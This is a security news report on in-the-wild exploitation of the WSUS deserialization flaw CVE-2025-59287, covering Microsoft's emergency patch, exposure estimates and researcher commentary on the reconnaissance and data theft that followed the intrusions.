A significant security threat has emerged as multiple organizations face attacks exploiting a serious vulnerability in Windows Server Update Services (WSUS), identified as CVE-2025-59287. This flaw, which allows remote code execution, is now under active exploitation shortly after Microsoft released an emergency patch, and the US Cybersecurity and Infrastructure Security Agency included it in its Known Exploited Vulnerabilities catalog.
Despite the urgency of the situation, Microsoft has not updated its guidance regarding this vulnerability to acknowledge the ongoing exploitation that has been reported by several reliable sources. The company continues to categorize CVE-2025-59287 as not publicly disclosed or exploited, although it does classify the likelihood of exploitation as “more likely,” a characterization that may underestimate the severity of the threat.
The Google Threat Intelligence Group (GTIG) indicated in communication with The Register that they are investigating the activities of a newly identified threat actor, referred to as UNC6512, which is targeting various victim organizations. According to GTIG, after gaining initial access, this actor has been seen executing a series of commands to gather information about the compromised systems and their environments, alongside exfiltrating data from affected hosts.
Microsoft has not provided a response to inquiries regarding the reported attacks, but it has noted that it typically refrains from updating security advisories after their release unless the initial information is found to be incorrect. The vulnerability affects Windows Server versions from 2012 to 2025 and arises from insecure deserialization of untrusted data, enabling unauthenticated attackers to execute arbitrary code on vulnerable systems. Servers lacking the WSUS role are not at risk.
Recent telemetry data reveals around 100,000 attempts to exploit this vulnerability in the past week alone. Microsoft initially addressed CVE-2025-59287 on October”s Patch Tuesday; however, the patch proved insufficient, prompting an emergency update late last Thursday. Following the release of this emergency patch, cybersecurity teams and threat researchers began observing active exploitation attempts.
Dustin Childs, head of threat awareness at Trend Micro”s Zero Day Initiative, stated that their scans indicate nearly 500,000 internet-facing servers have the WSUS service enabled. “Given the nature of the bug, we anticipate that nearly every affected server will experience attempts to exploit it,” he explained. He noted that the current exploitation appears to be indiscriminate, targeting a wide range of sectors and regions, and he expects the number of compromised systems to rise unless effective patches and mitigations are applied.
As of Monday, Palo Alto Networks” Unit 42 reported observing limited impacts on their customers. Justin Moore, a senior manager at Unit 42, pointed out that while WSUS is typically not exposed to the internet, instances where it is can lead to severe consequences for downstream entities. Their analysis suggests that the attackers are primarily focused on securing initial access and conducting reconnaissance within internal networks. The attackers are exploiting publicly accessible WSUS instances on their default TCP ports.
After breaching these systems, they execute PowerShell commands to gather information about the internal network, including commands like “whoami,” “net user /domain,” and “ipconfig /all.” The stolen data is then exfiltrated to a remote endpoint controlled by the attackers using PowerShell payloads that attempt to utilize Invoke-WebRequest or revert to curl.exe as necessary.
Moore cautioned that despite the seemingly limited number of exposed WSUS servers, the low complexity of the attack could lead to significant downstream impacts that are difficult to quantify. Although there is currently no evidence linking a specific threat actor or group to the exploitation of this vulnerability, the availability of proof-of-concept exploits since at least October 21 raises concerns about opportunistic attackers taking advantage of the flaw.
Childs had previously warned that this vulnerability would likely attract the attention of malicious actors, and he expressed concern regarding the adequacy of the initial patch. “The fact that the initial patch was bypassed is troubling for multiple reasons,” he stated. “When a vulnerability is easy to exploit and a proof-of-concept is accessible, it becomes a target for opportunistic threat actors.” He emphasized the need for accountability in ensuring that patches not only address functionality but also effectively resolve documented security issues.
